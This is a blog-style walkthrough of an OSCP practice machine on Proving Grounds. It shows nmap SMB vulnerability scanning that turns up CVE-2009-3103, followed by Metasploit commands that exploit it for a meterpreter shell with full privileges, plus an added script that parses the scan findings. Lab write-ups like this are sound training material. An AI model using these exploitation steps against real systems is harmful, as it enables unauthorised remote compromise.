Internal — Proving Grounds OSCP prep (practice, easy)
This is a walkthrough for Offensive Security’s internal box on their paid subscription service, Proving Grounds.
First things first
Connect to the VPN:
sudo openvpn ~/Downloads/pg.ovpn
*start up the target machine on the Proving Grounds site*
Set the target IP in a shell variable:
target="192.168.105.40"
Enumeration
Initial nmap scan:
nmap $target -sV -sC -oN nmap_1
Next, we further enumerate SMB with the smb-vuln NSE scripts:
nmap --script smb-vuln* -p 139,445 -oN smb-vuln-scan $target
Host script results:
| smb-vuln-cve2009-3103:
|   VULNERABLE:
|   SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497)
As you can see from the NSE script output, there is a vulnerability we can make use of. Next, we will try to find an exploit written for this vulnerability: CVE-2009-3103
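As an added example (not part of the original post), here is a small parser for the -oN output of that smb-vuln* scan, so the VULNERABLE findings and the CVE ids they cite can be pulled out for a report or patch list. The sample output it parses is constructed to match the shape of the NSE output shown above.

```python
"""Parse nmap -oN output from an `nmap --script smb-vuln*` scan and list
the host/script pairs that report VULNERABLE, with the CVE ids they cite.
Added example, not from the original post; the sample is constructed."""
import re

# Constructed sample: host header plus the "Host script results" block.
SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for 192.168.105.40

Host script results:
| smb-vuln-cve2009-3103:
|   VULNERABLE:
|   SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2009-3103
|_    Disclosure date: 2009-09-08
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
"""

HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
SCRIPT_RE = re.compile(r"^\|_?\s*(smb-vuln-[\w-]+):\s*(.*)$")  # block header
CVE_RE = re.compile(r"CVE-\d{4}-\d{4,}")
VULN_RE = re.compile(r"(?<!NOT )\bVULNERABLE\b")  # ignore "NOT VULNERABLE"


def parse_smb_vuln_report(text):
    """Return [{"host", "script", "cves"}] for each NSE block reporting VULNERABLE."""
    blocks, host = [], None
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:
            host = m.group(1)
            continue
        if not line.startswith("|"):
            continue  # port table, banners, blank lines
        m = SCRIPT_RE.match(line)
        if m:  # new script block; the rest of the line is its first body line
            blocks.append({"host": host, "script": m.group(1), "body": [m.group(2)]})
        elif blocks:
            blocks[-1]["body"].append(line.lstrip("|_ "))
    findings = []
    for b in blocks:  # 'false' and NT_STATUS_* results never match VULN_RE
        body = "\n".join(b["body"])
        if VULN_RE.search(body):
            findings.append({"host": b["host"], "script": b["script"],
                             "cves": sorted(set(CVE_RE.findall(body)))})
    return findings
```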
Exploitation
After several attempts at trying to use the non-Metasploit exploits, I gave up and used Metasploit. There were other exploits that offered RCE as well, but they were poorly written and not EDB verified. The official Proving Grounds write-up for this box uses a Metasploit exploit as well, so I suspect the talented folks over at Offensive Security had similar issues ;)
msfconsole
use exploit/windows/smb/ms09_050_smb2_negotiate_func_index
set RHOSTS <target-ip>
set LHOST <local-ip>
run
Now, you should have a meterpreter shell.
Post-Exploitation
You should have full privileges now. You will find the flag on the Administrator's desktop: proof.txt
Happy hacking, and good luck on your OSCP journey. If you want to see mine, check out my Noob to OSCP vlog. If you found this guide useful, please throw me some claps or a follow because it makes me happy :)